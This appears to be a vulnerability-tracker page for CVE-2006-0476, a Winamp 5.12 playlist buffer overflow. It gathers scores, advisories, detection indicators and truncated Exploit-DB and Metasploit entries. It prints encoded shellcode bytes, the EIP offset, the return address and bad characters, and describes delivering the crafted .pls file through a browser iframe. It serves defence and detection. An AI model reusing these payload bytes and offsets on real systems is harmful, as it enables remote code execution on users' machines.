CVE-2006-0476
published 2006-01-31CVE-2006-0476: Buffer overflow in Nullsoft Winamp 5.12 allows remote attackers to execute arbitrary code via a playlist (pls) file with a long file name (File1 field).
PriorityP354high7.6CVSS 2.0
AVNACHAuNCCICAC
EXPLOIT
EPSS
74.51%
99.4th percentile
Buffer overflow in Nullsoft Winamp 5.12 allows remote attackers to execute arbitrary code via a playlist (pls) file with a long file name (File1 field).
Affected
18 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
| nullsoft | winamp | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x61\xD9\x02\x02\x83\xEC\x34\x83\xEC\x70\xFF\xE4
bytes↗
\x54\x50\x53\x50\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x02\xdd\x0e\x4d\x83\xee\xfc\xe2\xf4\xfe\x35\x4a\x4d\x02\xdd\x85\x08\x3e\x56\x72\x48\x7a\xdc\xe1\xc6\x4d\xc5\x85\x12\x22\xdc\xe5\x04\x89\xe9\x85\x4c\xec\xec\xce\xd4\xae\x59\xce\x39\x05\x1c\xc4\x40\x03\x1f\xe5\xb9\x39\x89\x2a\x49\x77\x38\x85\x12\x26\xdc\xe5\x2b\x89\xd1\x45\xc6\x5d\xc1\x0f\xa6\x89\xc1\x85\x4c\xe9\x54\x52\x69\x06\x1e\x3f\x8d\x66\x56\x4e\x7d\x87\x1d\x76\x41\x89\x9d\x02\xc6\x72\xc1\xa3\xc6\x6a\xd5\xe5\x44\x89\x5d\xbe\x4d\x02\xdd\x85\x25\x3e\x82\x3f\xbb\x62\x8b\x87\xb5\x81\x1d\x75\x1d\x6a\xa3\xd6\xaf\x71\xb5\x96\xb3\x88\xd3\x59\xb2\xe5\xbe\x6f\x21\x61\xdd\x0e\x4d
bytes↗
\x87\xe1
- →Malicious .pls playlist file delivered via browser containing a UNC path (\\<long_computer_name>) in the File1= field with a computer name of ~1026 bytes, overwriting EIP at offset 1022. ↗
- →Detect .pls playlist files where the File<N>= field begins with \\\\ (UNC path) and the computer name component exceeds 1022 bytes — indicative of buffer overflow exploitation. ↗
- →Payload bad characters for this exploit are null byte, backslash, forward slash, CR, LF, and space (\x00\x5c\x2f\x0a\x0d\x20); encoded shellcode in .pls UNC field will avoid these bytes. ↗
- →The exploit prepends \x87\xe1 (XCHG ECX,ESP) to the payload encoder to restore ESP from ECX after landing on the \x5c\x5c UNC prefix trashes ESP; presence of this two-byte sequence at the start of shellcode in a .pls file is a strong indicator. ↗
- →The Metasploit module supports a PlaylistSpaceInjection evasion option that inserts random spaces/tabs around keys and values in the playlist; detect .pls files with abnormal whitespace around '=' delimiters. ↗
- →The jump-to-shellcode sequence \x61\xD9\x02\x02\x83\xEC\x34\x83\xEC\x70\xFF\xE4 appears at a fixed offset within the malicious .pls UNC computer name field; scan .pls file content for this byte pattern. ↗
- ·The Metasploit return address (0x0d45fece) is specific to Winamp 5.12 Universal only; the byte 0x0d is replaced by 0x00 during processing, which is an intentional exploit design detail. ↗
- ·The Metasploit module was only successfully tested against Winamp 5.11 and 5.12; the payload space is limited to 526 bytes. ↗
- ·NOP sleds are explicitly disabled in the Metasploit payload configuration to avoid modifying the ECX register, which is used for ESP restoration. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-249v-jf5r-cp5r: Multiple buffer overflows in NullSoft Winamp 5
ghsa_unreviewed·2022-05-01·CVSS 7.6
CVE-2006-0708 [HIGH] GHSA-249v-jf5r-cp5r: Multiple buffer overflows in NullSoft Winamp 5
Multiple buffer overflows in NullSoft Winamp 5.13 and earlier allow remote attackers to execute arbitrary code via (1) an m3u file containing a long URL ending in .wma, (2) a pls file containing a File1 field with a long URL ending in .wma, or (3) an m3u file with a long filename, variants of CVE-2005-3188 and CVE-2006-0476.
GHSA
GHSA-jv33-3xgx-xjg2: Buffer overflow in Nullsoft Winamp 5
ghsa_unreviewed·2022-05-01
CVE-2006-0476 [HIGH] GHSA-jv33-3xgx-xjg2: Buffer overflow in Nullsoft Winamp 5
Buffer overflow in Nullsoft Winamp 5.12 allows remote attackers to execute arbitrary code via a playlist (pls) file with a long file name (File1 field).
GHSA
GHSA-8jv5-qc9q-5qfw: Buffer overflow in Nullsoft Winamp 5
ghsa_unreviewed·2022-05-01·CVSS 7.6
CVE-2005-3188 [HIGH] GHSA-8jv5-qc9q-5qfw: Buffer overflow in Nullsoft Winamp 5
Buffer overflow in Nullsoft Winamp 5.094 allows remote attackers to execute arbitrary code via (1) an m3u file containing a long line ending in .wma or (2) a pls file containing a long File1 value ending in .wma, a different vulnerability than CVE-2006-0476.
No detection rules found.
Exploit-DB
Winamp - Playlist UNC Path Computer Name Overflow (Metasploit)
exploitdb·2010-04-30
CVE-2006-0476 Winamp - Playlist UNC Path Computer Name Overflow (Metasploit)
Winamp - Playlist UNC Path Computer Name Overflow (Metasploit)
---
##
# $Id: winamp_playlist_unc.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Winamp Playlist UNC Path Computer Name Overflow',
'Description' => %q{
This module exploits a vulnerability in the Winamp media player.
This flaw is triggered when a audio file path is specified, inside a
playlist, that consists of a UNC path with a long computer name. This
module delivers the playlist via the browser. This module has only
been successfully test
Exploit-DB
Winamp 5.12 - '.pls' Remote Buffer Overflow (Perl) (2)
exploitdb·2007-03-07
CVE-2006-0476 Winamp 5.12 - '.pls' Remote Buffer Overflow (Perl) (2)
Winamp 5.12 - '.pls' Remote Buffer Overflow (Perl) (2)
---
#!/usr/bin/perl -w
# ===============================================================================================
# Winamp 5.12 Playlist UNC Path Computer Name Overflow Perl Exploit
# By Umesh Wanve ([email protected])
# ===========================================================================================================================
# Credits : ATmaCA is credited with the discovery of this vulnerability.
#
# Date : 07-03-2007
#
# Tested on Windows 2000 SP4 Server English
# Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
#
# Buffer = "\x90 x 1023" + EIP
#
# Desc: you cant put shellcode after EIP. No more space after this. The winamp simply crashes. When you debug it,
Exploit-DB
Winamp 5.12 - '.pls' Remote Buffer Overflow (Metasploit)
exploitdb·2006-01-31
CVE-2006-0476 Winamp 5.12 - '.pls' Remote Buffer Overflow (Metasploit)
Winamp 5.12 - '.pls' Remote Buffer Overflow (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::winamp_playlist_unc;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use IPC::Open3;
my $advanced =
{
'Gzip' => [1, 'Enable gzip content encoding'],
'Chunked' => [1, 'Enable chunked transfer encoding'],
'Humor' => [0, 'Enable humorous song names'],
};
my $info =
{
'Name' => 'Winamp Playlist UNC Path Computer Name Overflo
Exploit-DB
Winamp 5.12 - '.pls' Remote Buffer Overflow (1)
exploitdb·2006-01-29
CVE-2006-0476 Winamp 5.12 - '.pls' Remote Buffer Overflow (1)
Winamp 5.12 - '.pls' Remote Buffer Overflow (1)
---
/*
*
* Winamp 5.12 Remote Buffer Overflow Universal Exploit (Zero-Day)
* Bug discovered & exploit coded by ATmaCA
* Web: http://www.spyinstructors.com && http://www.atmacasoft.com
* E-Mail: [email protected]
* Credit to Kozan
*
*/
/*
*
* Tested with :
* Winamp 5.12 on Win XP Pro Sp2
*
*/
/*
* Usage:
*
* Execute exploit, it will create "crafted.pls" in current directory.
* Duble click the file, or single click right and then select "open".
* And Winamp will launch a Calculator (calc.exe)
*
*/
/*
*
* For to use it remotly,
* make a html page containing an iframe linking to the .pls file.
*
* http://www.spyinstructors.com/atmaca/research/winamp_ie_poc.htm
*
*/
#include
#include
#define BUF_LEN 0x045D
#define PLAYLIST_FILE "crafted.pl
Metasploit
Winamp Playlist UNC Path Computer Name Overflow
metasploit
Winamp Playlist UNC Path Computer Name Overflow
Winamp Playlist UNC Path Computer Name Overflow
This module exploits a vulnerability in the Winamp media player. This flaw is triggered when an audio file path is specified, inside a playlist, that consists of a UNC path with a long computer name. This module delivers the playlist via the browser. This module has only been successfully tested on Winamp 5.11 and 5.12.
No writeups or analysis indexed.
http://secunia.com/advisories/18649http://securityreason.com/securityalert/386http://securityreason.com/securityalert/398http://securitytracker.com/id?1015552http://www.heise.de/newsticker/meldung/68981http://www.kb.cert.org/vuls/id/604745http://www.osvdb.org/22789http://www.securityfocus.com/archive/1/423436/100/0/threadedhttp://www.securityfocus.com/archive/1/423548/100/0/threadedhttp://www.securityfocus.com/bid/16410http://www.us-cert.gov/cas/techalerts/TA06-032A.htmlhttp://www.vupen.com/english/advisories/2006/0361http://www.winamp.com/player/version_history.phphttps://exchange.xforce.ibmcloud.com/vulnerabilities/24361https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1402https://www.exploit-db.com/exploits/3422http://secunia.com/advisories/18649http://securityreason.com/securityalert/386http://securityreason.com/securityalert/398http://securitytracker.com/id?1015552http://www.heise.de/newsticker/meldung/68981http://www.kb.cert.org/vuls/id/604745http://www.osvdb.org/22789http://www.securityfocus.com/archive/1/423436/100/0/threadedhttp://www.securityfocus.com/archive/1/423548/100/0/threadedhttp://www.securityfocus.com/bid/16410http://www.us-cert.gov/cas/techalerts/TA06-032A.htmlhttp://www.vupen.com/english/advisories/2006/0361http://www.winamp.com/player/version_history.phphttps://exchange.xforce.ibmcloud.com/vulnerabilities/24361https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1402https://www.exploit-db.com/exploits/3422
2006-01-31
Published